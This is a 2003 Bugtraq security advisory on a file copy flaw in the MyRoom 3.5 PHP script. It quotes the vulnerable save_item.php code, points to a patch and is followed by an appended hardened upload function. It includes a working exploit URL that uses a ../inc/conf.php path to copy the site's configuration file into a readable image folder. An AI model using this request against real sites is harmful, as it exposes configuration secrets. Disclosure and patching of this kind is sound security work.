[28543] in bugtraq


MyRoom (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Wed Jan 22 03:50:32 2003

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 19 Jan 2003 01:42:39 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F126qfT7eEmP9CDBHy300017b6b@hotmail.com>

Information :
°°°°°°°°°°°°°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
room/save_item.php :
------------------------------------------------------------------------
if($name == "" OR $ref == ""){
echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
echo "<br>";
echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
exit;
}

if($photo!="none" AND $photo!="application/octet-stream"){

	//get type of file
	$filetype=$photo_type;

	//get lenght of image type
	$filelenght=strlen($filetype);

	//get part of file image to build image extension
	$pos=strpos($filetype,"/")+1;

	//build extension of image
	$fileextention=substr($filetype,$pos,$filelenght);

	if($fileextention=="pjpeg"){
	$fileextention="jpg";
	}


	$image=date("YmdHis");
	$image.=".".$fileextention;
	$imgpath = "$imgroot";

	//if image exist, upload it in correct dir
	if($photov<>"none") {
	  if(!copy($photo,"$imgpath/$image")) {
		//display errors
		$msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>";
		break;
	  }
	//or finish
	  else {
	  	dbconnect();
	  	$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'";
		mysql_query($sql) or die(mysql_error());
		echo "<meta http-equiv='refresh' content='0;URL= $main_file?show=additem&m=1&i=$name'>";
	       	echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>";
	  }
	}

------------------------------------------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt

+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the URL of the txt file which contains conf.php.

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (English version available).


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyRoom.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n
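
Added example (not part of the original post, not the phpsecure.info patch and not the vendor's code): a hardened form of the copy() step in save_item.php, which in the excerpt trusts $photo and $photo_type even when they arrive as plain request parameters. The function name store_item_photo, the form field name "photo" and the allowed type list are assumptions made for illustration.

```php
<?php
// Added example: only real uploads are accepted, and the stored extension
// comes from the detected content, never from a request-supplied type.

// Assumed allowlist: detected MIME type => extension written to disk.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the generated file name, or null when the upload is rejected.
function store_item_photo(array $files, string $imgroot): ?string
{
    // Read only from $_FILES; a "photo" value in the query string is never
    // treated as a file path. The strict error check also rejects array
    // uploads (photo[]), where 'error' is an array.
    $upload = $files['photo'] ?? null;
    if (!is_array($upload) || ($upload['error'] ?? null) !== UPLOAD_ERR_OK) {
        return null;
    }
    $tmp = $upload['tmp_name'];

    // Refuse any path that PHP did not create for an upload in this request
    // (this is what stops a value such as ../inc/conf.php).
    if (!is_string($tmp) || !is_uploaded_file($tmp)) {
        return null;
    }

    // Detect the type from the file content; $upload['type'] is client data.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }

    // Server-chosen name: timestamp as in the original, plus random bytes.
    $name = date('YmdHis') . '_' . bin2hex(random_bytes(8))
          . '.' . ALLOWED_IMAGE_TYPES[$mime];

    // move_uploaded_file() repeats the upload check before writing.
    if (!move_uploaded_file($tmp, rtrim($imgroot, '/') . '/' . $name)) {
        return null;
    }
    return $name;
}

// In save_item.php: $image = store_item_photo($_FILES, $imgroot);
```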





